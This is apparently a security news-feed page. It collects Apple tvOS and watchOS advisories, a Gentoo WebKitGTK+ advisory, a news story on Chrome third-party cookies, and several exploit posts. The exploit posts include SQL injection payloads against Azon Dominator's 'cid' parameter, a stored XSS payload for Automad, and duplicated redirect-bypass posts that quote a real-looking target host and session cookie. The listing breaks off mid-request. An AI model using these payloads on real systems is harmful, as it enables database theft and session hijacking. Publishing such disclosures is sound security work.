Apple Security Advisory 07-29-2024-8 - tvOS 17.6 addresses bypass, information leakage, integer overflow, out of bounds access, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-07-29-2024-8 tvOS 17.6

tvOS 17.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214122.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

AppleMobileFileIntegrity  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to bypass Privacy preferences  
Description: A downgrade issue was addressed with additional code-  
signing restrictions.  
CVE-2024-40774: Mickey Jin (@patch1t)

CoreGraphics  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2024-40799: D4m0n

dyld  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious attacker with arbitrary read and write capability  
may be able to bypass Pointer Authentication  
Description: A race condition was addressed with additional validation.  
CVE-2024-40815: w0wbox

Family Sharing  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: This issue was addressed with improved data protection.  
CVE-2024-40795: Csaba Fitzl (@theevilbit) of Kandji

ImageIO  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing an image may lead to a denial-of-service  
Description: This is a vulnerability in open source code and Apple  
Software is among the affected projects. The CVE-ID was assigned by a  
third party. Learn more about the issue and CVE-ID at cve.org.  
CVE-2023-6277  
CVE-2023-52356

ImageIO  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2024-40806: Yisumi

ImageIO  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-40777: Junsung Lee working with Trend Micro Zero Day  
Initiative, and Amir Bazine and Karsten König of CrowdStrike Counter  
Adversary Operations

ImageIO  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2024-40784: Junsung Lee working with Trend Micro Zero Day Initiative  
and Gandalf4a

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A local attacker may be able to determine kernel memory layout  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-27863: CertiK SkyFall Team

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A local attacker may be able to cause unexpected system shutdown  
Description: A type confusion issue was addressed with improved memory  
handling.  
CVE-2024-40788: Minghao Lin and Jiaxun Zhu from Zhejiang University

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to bypass Privacy preferences  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-40805

Sandbox  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed through improved state management.  
CVE-2024-40824: Wojciech Regula of SecuRing (wojciechregula.blog) and  
Zhongquan Li (@Guluisacat) from Dawn Security Lab of JingDong

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: A use-after-free issue was addressed with improved memory  
management.  
WebKit Bugzilla: 273176  
CVE-2024-40776: Huang Xilin of Ant Group Light-Year Security Lab  
WebKit Bugzilla: 268770  
CVE-2024-40782: Maksymilian Motyl

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
WebKit Bugzilla: 275431  
CVE-2024-40779: Huang Xilin of Ant Group Light-Year Security Lab  
WebKit Bugzilla: 275273  
CVE-2024-40780: Huang Xilin of Ant Group Light-Year Security Lab

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may lead to a cross  
site scripting attack  
Description: This issue was addressed with improved checks.  
WebKit Bugzilla: 273805  
CVE-2024-40785: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-40789: Seunghyun Lee (@0x10n) of KAIST Hacking Lab working with  
Trend Micro Zero Day Initiative

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmaoIFQACgkQX+5d1TXa  
IvrqRg/+Klv/Cy1M7Ii5T/jTDQ9ggrY36CjR6GJaFwXMlC++eNYidc9LeVNU72PI  
F7GpQ6ZntYJZzEm1YGUOjkU38IYid5lnfDQHsfTTm8Pzmk+1vbcLDYEfsoeGK81F  
7qcirUzseRYBmvbei2X2HqiGh/bLJgHUb433lDPQcVIUNmvdYuGtaDYNnbhOJ80u  
+LET8E2GjIVWY15ZtSHC59OctUPtI6l6HrncqLTjXegePCqLC2Z4BIGmnPoyOGSf  
zTgFXSfekwZ/5y6PKPhDu+NgrrCI+IhP20mO0pj2IhQgd56yEdF6P7dYrWlElQmi  
/MoMZTzfxQPBzHxcfmG4ANqMSJzE3oZ737r32o4dwsdIiBJ9JG+UV9722kk+CH+7  
NKN1GBxf05kEXXJ+Y4c9VyCMQVxW9RaPQic89WoWA7JQsrmah8osHFnxTxL4d12X  
cR5JohihgI+EE4N+MqlT/CKE+0r/Oy6yalRCJQugA1fBQiIa57twRK3+sGQUqtn0  
fI2PmXTkF47pm9ed7foE+XtknEerfvGruWH3SUAKo46Q3yUGvR1cQ4v1lzXG51AR  
+6rV79CKWRztAqXS6uermURsTBcUDnnHH+9HH+2kLOyNuQ/F6Th1Ng1CUWrMJeSf  
eE1sp6m+eR3uuUPwfEPZwJxhlUlZj4kaQE8gipr3DBrZFCJY6To=  
=prdc  
-----END PGP SIGNATURE-----

Apple Security Advisory 07-29-2024-8

Apple Security Advisory 07-29-2024-7 - watchOS 10.6 addresses bypass, information leakage, integer overflow, out of bounds access, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-07-29-2024-7 watchOS 10.6

watchOS 10.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214124.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: A downgrade issue was addressed with additional code-  
signing restrictions.  
CVE-2024-40774: Mickey Jin (@patch1t)

CoreGraphics  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2024-40799: D4m0n

dyld  
Available for: Apple Watch Series 4 and later  
Impact: A malicious attacker with arbitrary read and write capability  
may be able to bypass Pointer Authentication  
Description: A race condition was addressed with additional validation.  
CVE-2024-40815: w0wbox

Family Sharing  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: This issue was addressed with improved data protection.  
CVE-2024-40795: Csaba Fitzl (@theevilbit) of Kandji

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing an image may lead to a denial-of-service  
Description: This is a vulnerability in open source code and Apple  
Software is among the affected projects. The CVE-ID was assigned by a  
third party. Learn more about the issue and CVE-ID at cve.org.  
CVE-2023-6277  
CVE-2023-52356

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2024-40806: Yisumi

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-40777: Junsung Lee working with Trend Micro Zero Day  
Initiative, Amir Bazine and Karsten König of CrowdStrike Counter  
Adversary Operations

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2024-40784: Junsung Lee working with Trend Micro Zero Day Initiative  
and Gandalf4a

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: A local attacker may be able to determine kernel memory layout  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-27863: CertiK SkyFall Team

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: A local attacker may be able to cause unexpected system shutdown  
Description: A type confusion issue was addressed with improved memory  
handling.  
CVE-2024-40788: Minghao Lin and Jiaxun Zhu from Zhejiang University

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-40805

Phone  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: A lock screen issue was addressed with improved state  
management.  
CVE-2024-40813: Jacob Braun

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed through improved state management.  
CVE-2024-40824: Wojciech Regula of SecuRing (wojciechregula.blog) and  
Zhongquan Li (@Guluisacat) from Dawn Security Lab of JingDong

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: A logic issue was addressed with improved checks.  
CVE-2024-40835: an anonymous researcher  
CVE-2024-40836: an anonymous researcher

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: A shortcut may be able to bypass Internet permission  
requirements  
Description: A logic issue was addressed with improved checks.  
CVE-2024-40809: an anonymous researcher  
CVE-2024-40812: an anonymous researcher

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: A shortcut may be able to bypass Internet permission  
requirements  
Description: This issue was addressed by adding an additional prompt for  
user consent.  
CVE-2024-40787: an anonymous researcher

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-40793: Kirin (@Pwnrin)

Siri  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: This issue was addressed by restricting options offered on  
a locked device.  
CVE-2024-40818: Bistrit Dahal and Srijan Poudel

Siri  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with physical access to a device may be able to  
access contacts from the lock screen  
Description: This issue was addressed by restricting options offered on  
a locked device.  
CVE-2024-40822: Srijan Poudel

VoiceOver  
Available for: Apple Watch Series 4 and later  
Impact: An attacker may be able to view restricted content from the lock  
screen  
Description: The issue was addressed with improved checks.  
CVE-2024-40829: Abhay Kailasia (@abhay_kailasia) of Lakshmi Narain  
College of Technology Bhopal India

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: A use-after-free issue was addressed with improved memory  
management.  
WebKit Bugzilla: 273176  
CVE-2024-40776: Huang Xilin of Ant Group Light-Year Security Lab  
WebKit Bugzilla: 268770  
CVE-2024-40782: Maksymilian Motyl

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
WebKit Bugzilla: 275431  
CVE-2024-40779: Huang Xilin of Ant Group Light-Year Security Lab  
WebKit Bugzilla: 275273  
CVE-2024-40780: Huang Xilin of Ant Group Light-Year Security Lab

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to a cross  
site scripting attack  
Description: This issue was addressed with improved checks.  
WebKit Bugzilla: 273805  
CVE-2024-40785: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-40789: Seunghyun Lee (@0x10n) of KAIST Hacking Lab working with  
Trend Micro Zero Day Initiative

Additional recognition

Shortcuts  
We would like to acknowledge an anonymous researcher for their  
assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmaoICUACgkQX+5d1TXa  
IvoXBQ/+K5v4MYwo1Lr0ZOzH2g2WI2cuYrXSeos2rbmgHLyriF6TlW8FnwHMBF4c  
1yqOp5vmv7hfkYUHXdIlLX7VUCdYSSu+FAPVjykogqTTa09dsMRMK1mu8MulXxPO  
eSvWdEF8HrPe7Aw45jHIxxilJC50TRDZbIl1HWO4w0qi6G2dNwnQwCLC2BkiqXp7  
7t60Ou9HdILroG3xUUl+EUM+RN7rcqfJ6pkPWmgNUdT31mln7jb++RXzsS00d6ee  
HEH96qVAlEq8A5LQmNmpru8MatI0l5sr1qtfb/prY0A10lCUb8IwCeDL1v13RAlN  
/7WWD5sLqM4yhvQKgN956Bmn9ggfzB+BsOORl6Eei6w/QRi/caZEC9yty9ylHJqJ  
65ApHnhgEtCul/uvlzCnVJbZJZBMZYTaVeRftDAp49FH8sBlLyPka4ym/aeOnU76  
tP7GcDVkmK7oDeCqNuSM0XPxBI7zc2CZ5aZq0y+OBfLWWo0kBORkksyDWylhk0cD  
wAzyyFt0oUgYH7bwpu4pRE5b3ZcaUzt6hCruRCKC+m28sMQ9bkqfuzCResZ+CCHS  
Lf0wg1wI+4AjAcIEEZ13A7v8tKoC0PHr1ByJe7LXSTTdxkiOOHmkhD+Iy6/Xyc+4  
zRBKwUtbmniB+aHFqU3Qp0eDTFlNAg01lN15BH6pLKwfXD0ERIk=  
=MEx2  
-----END PGP SIGNATURE-----

Apple Security Advisory 07-29-2024-7

PPDB ONLINE version 1.3 appears to suffer from an administrative page disclosure issue.

====================================================================================================================================  
| # Title     : PPDB ONLINE V.1.3  HTML Form in redirect page Vulnerability                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   |  
| # Vendor    : https://berkas.siap-ppdb.com/                                                                                      |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

PPDB ONLINE 1.3 Administrative Page Disclosure

Google on Monday abandoned plans to phase out third-party tracking cookies in its Chrome web browser more than four years after it introduced the option as part of a larger set of a controversial proposal called the Privacy Sandbox.
"Instead of deprecating third-party cookies, we would introduce a new experience in Chrome that lets people make an informed choice that applies across their web

Online Privacy / Regulatory Compliance

Google on Monday abandoned plans to phase out third-party tracking cookies in its Chrome web browser more than four years after it introduced the option as part of a larger set of a controversial proposal called the Privacy Sandbox.

"Instead of deprecating third-party cookies, we would introduce a new experience in Chrome that lets people make an informed choice that applies across their web browsing, and they'd be able to adjust that choice at any time," Anthony Chavez, vice president of the initiative, said.

"We're discussing this new path with regulators, and will engage with the industry as we roll this out."

The significant policy reversal comes nearly three months following the company's announcement that it intends to eliminate third-party cookies starting early next year after repeated delays, underscoring the project's tumultuous history.

While Apple Safari and Mozilla Firefox no longer support third-party cookies as of early 2020, Google has had a tougher time turning it off owing to its own prominent role as a web browser vendor and an advertising platform.

The company's idea of balancing online privacy vis-à-vis an ad-supported internet using Privacy Sandbox has courted scrutiny from regulators, advertisers, and privacy advocates, prompting it to redraw the contours of the cookie-replacement technology several times over the past few years.

Last month, Austrian privacy non-profit noyb (none of your business) said it merely shifts the control from a third-party to Google and that it can still be used to track users without giving them an option to consent in an informed and transparent manner.

Apple, which has introduced advanced tracking and fingerprinting protections in Safari, has been critical of Topics API, a crucial aspect of Privacy Sandbox that sorts users' interests into an ever-evolving list of predefined topics based on their browsing histories in order to serve personalized ads.

"The user doesn't get told upfront which topics Chrome has tagged them with or which topics it exposes to which parties," Apple's WebKit team said, noting how it can be used to fingerprint and re-identify users as well as profile their cross-site activity.

Specifically, it pointed out implementation loopholes that could potentially allow a data broker embedded in websites to capture a user's changing interests over time by periodically querying the Topics API and creating a permanent profile by combining it with other data points.

"Now imagine what advanced machine learning and artificial intelligence can deduce about you based on various combinations of interest signals," the iPhone maker said. "What patterns will emerge when data brokers and trackers can compare and contrast across large portions of the population?"

"We think the web should not expose such information across websites and we don't think the browser, i.e. the user agent, should facilitate any such data collection or use."

Privacy Sandbox has also faced regulatory hurdles over concerns that the technology could give Google an unfair advantage in the digital advertising market and limit competition, complicating the rollout process further.

The development is an admission from Google that gaining industry-wide consensus around a single solution is more challenging than it sounds. A pivot from cookies "requires significant work by many participants and will have an impact on publishers, advertisers, and everyone involved in online advertising," it said.

The U.K. Competition and Markets Authority (CMA), which is closely overseeing the changes being made by the search giant, said it's evaluating the impact of the new announcement.

"Instead of removing third-party cookies from Chrome, it will be introducing a user-choice prompt, which will allow users to choose whether to retain third-party cookies," the CMA said. "The CMA will now work closely with the \[Information Commissioner's Office\] to carefully consider Google's new approach to Privacy Sandbox."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Abandons Plan to Phase Out Third-Party Cookies in Chrome

Candy Redis version 2.1.2 appears to suffer from an administrative page disclosure issue.

====================================================================================================================================  
| # Title     : Candy Redis V2.1.2 HTML Form in redirect page Vulnerability                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   |  
| # Vendor    : https://bacadigital.com/pasti-bisa-panduan-ujian-cbt-untuk-pengguna/                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

Candy Redis 2.1.2 Admin Page Disclosure

Gentoo Linux Security Advisory 202407-13 - Multiple vulnerabilities have been discovered in WebKitGTK+, the worst of which could lead to arbitrary code execution Versions greater than or equal to 2.44.0:4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: WebKitGTK+: Multiple Vulnerabilities  
     Date: July 05, 2024  
     Bugs: #923851, #930116  
       ID: 202407-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in WebKitGTK+, the worst  
of which could lead to arbitrary code execution

Background  
==========

WebKitGTK+ is a full-featured port of the WebKit rendering engine,  
suitable for projects requiring any kind of web integration, from hybrid  
HTML/CSS applications to full-fledged web browsers.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  -------------  
net-libs/webkit-gtk  < 2.44.0:4    >= 2.44.0:4  
                     < 2.44.0:4.1  >= 2.44.0:4.1  
                     < 2.44.0:6    >= 2.44.0:6

Description  
===========

Multiple vulnerabilities have been discovered in WebKitGTK+. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All WebKitGTK+ users should upgrade to the latest version (depending on  
the installed slots):

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.44.0:4"  
  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.44.0:4.1"  
  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.44.0:6"

References  
==========

[ 1 ] CVE-2014-1745  
      https://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1745  
[ 2 ] CVE-2023-40414  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40414  
[ 3 ] CVE-2023-42833  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42833  
[ 4 ] CVE-2023-42843  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42843  
[ 5 ] CVE-2023-42950  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42950  
[ 6 ] CVE-2023-42956  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42956  
[ 7 ] CVE-2024-23206  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23206  
[ 8 ] CVE-2024-23213  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23213  
[ 9 ] CVE-2024-23222  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23222  
[ 10 ] CVE-2024-23252  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23252  
[ 11 ] CVE-2024-23254  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23254  
[ 12 ] CVE-2024-23263  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23263  
[ 13 ] CVE-2024-23280  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23280  
[ 14 ] CVE-2024-23284  
      https://nvd.nist.gov/vuln/detail/CVE-2024-23284  
[ 15 ] WSA-2024-0001  
      https://webkitgtk.org/security/WSA-2024-0001.html  
[ 16 ] WSA-2024-0002  
      https://webkitgtk.org/security/WSA-2024-0002.html

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-13

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-13

Azon Dominator Affiliate Marketing Script suffers from a remote SQL injection vulnerability.

    # Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection# Date: 2024-06-03# Exploit Author: Buğra Enis Dönmez# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script# Demo Site: https://azon-dominator.webister.net/# Tested on: Arch Linux# CVE: N/A### Request ###POST /fetch_products.php HTTP/1.1Content-Type: application/x-www-form-urlencodedAccept: */*x-requested-with: XMLHttpRequestReferer: https://localhost/Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8Content-Length: 79Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: localhostConnection: Keep-alivecid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112###### Parameter & Payloads ###Parameter: cid (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: cid=1) AND 7735=7735 AND (5267=5267    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442###

Azon Dominator Affiliate Marketing Script SQL Injection

Automad version 2.0.0-alpha.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)# Date: 20-06-2024# Exploit Author: Jerry Thomas (w3bn00b3r)# Vendor Homepage: https://automad.org# Software Link: https://github.com/marcantondahmen/automad# Category: Web Application [Flat File CMS]# Version: 2.0.0-alpha.4# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11(bullseye)# DescriptionA persistent (stored) cross-site scripting (XSS) vulnerability has beenidentified in Automad 2.0.0-alpha.4. This vulnerability enables an attackerto inject malicious JavaScript code into the template body. The injectedcode is stored within the flat file CMS and is executed in the browser ofany user visiting the forum. This can result in session hijacking, datatheft, and other malicious activities.# Proof-of-Concept*Step-1:* Login as Admin & Navigate to the endpointhttp://localhost/dashboard/home*Step-2:* There will be a default Welcome page. You will find an option toedit it.*Step-3:* Navigate to Content tab orhttp://localhost/dashboard/page?url=%2F&section=text & edit the block named***`Main`****Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)>*Request:*POST 